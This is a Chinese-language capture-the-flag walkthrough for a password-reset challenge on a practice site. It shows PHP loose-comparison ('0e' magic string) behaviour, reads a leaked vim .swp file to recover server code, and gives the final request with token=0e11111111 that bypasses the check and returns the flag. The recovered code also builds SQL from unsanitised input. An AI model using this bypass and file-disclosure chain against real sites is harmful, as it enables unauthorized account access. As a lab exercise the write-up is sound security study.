實驗吧-找回密碼
阿新 • • 發佈:2018-12-17
首先是PHP的基本知識瞭解,如下:
PHP程式碼:
<?php
$a=1e+3;
$b='1e3';
$c=1e-1;
var_dump($a);
var_dump($b);
var_dump($c);
?>
輸出
float(1000)
string(3) "1e3"
float(0.1)
PHP程式碼
<?php
$d='0e11111111';
if($d != '0'){
echo "no";
}
else {
echo "yes";
}
?>
輸出
yes
開始解題
首先看http://ctf5.shiyanbar.com/10/upload/step1.php的頁面程式碼
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="renderer" content="webkit" /> <meta name="admin" content="[email protected]" /> <meta name="editor" content="Vim" /> </head> <body> <form action="./step1.php" method="GET"> <h1>找回密碼step1</h1> input regist email:<input name="emailAddress" type="text" /></br> <input type="submit" value="提交"> </form> </body> </html>
當我們輸入一個郵箱,提交時,檢視response
<script>alert("你郵箱收到的重置密碼連結為 ./[email protected]&check=???????")</script> <title>logic</title>
所以我們繼續訪問step2.php
http://ctf5.shiyanbar.com/10/upload/[email protected]&check=12345
檢視response,發現頁面程式碼中有一個表單指向submit.php:
<form action="submit.php" method="GET">
<h1>找回密碼step2</h1>
email:<input name="emailAddress" type="text" <br />
<b>Notice</b>: Use of undefined constant email - assumed 'email' in <b>C:\h43a1W3\phpstudy\WWW\10\upload\step2.php</b> on line <b>49</b><br />
value=" [email protected]" disable="true"/></br>
token:<input name="token" type="text" /></br>
<input type="submit" value="提交">
</form>
繼續
http://ctf5.shiyanbar.com/10/upload/[email protected]&token=123
頁面顯示:you are not an admin
回到上面step1.php和step2.php的頁面程式碼中:
<meta name="admin" content="[email protected]" />
<meta name="editor" content="Vim" />
那我們把[email protected]放進去
[email protected]&token=123
此時頁面變化fail
那問題在token上了,在看前面的頁面程式碼
<meta name="editor" content="Vim" />
vim編輯器異常退出,會產生一個.submit.php.swp的檔案,訪問這個檔案
http://ctf5.shiyanbar.com/10/upload/.submit.php.swp
獲得部分程式碼,開始程式碼審計:
if(!empty($token)&&!empty($emailAddress)){
if(strlen($token)!=10) die('fail');
if($token!='0') die('fail');
$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";
$r = mysql_query($sql) or die('db error');
$r = mysql_fetch_assoc($r);
$r = $r['num'];
if($r>0){
echo $flag;
}else{
token要長度為10,並且等於’0’,那設計如下(參考最開始的PHP基礎知識部分)
token=0e11111111
最後payload
[email protected]&token=0e11111111
成功拿到flag
flag is SimCTF{*******}
最後提交的時候,注意審題:
格式:SimCTF{ }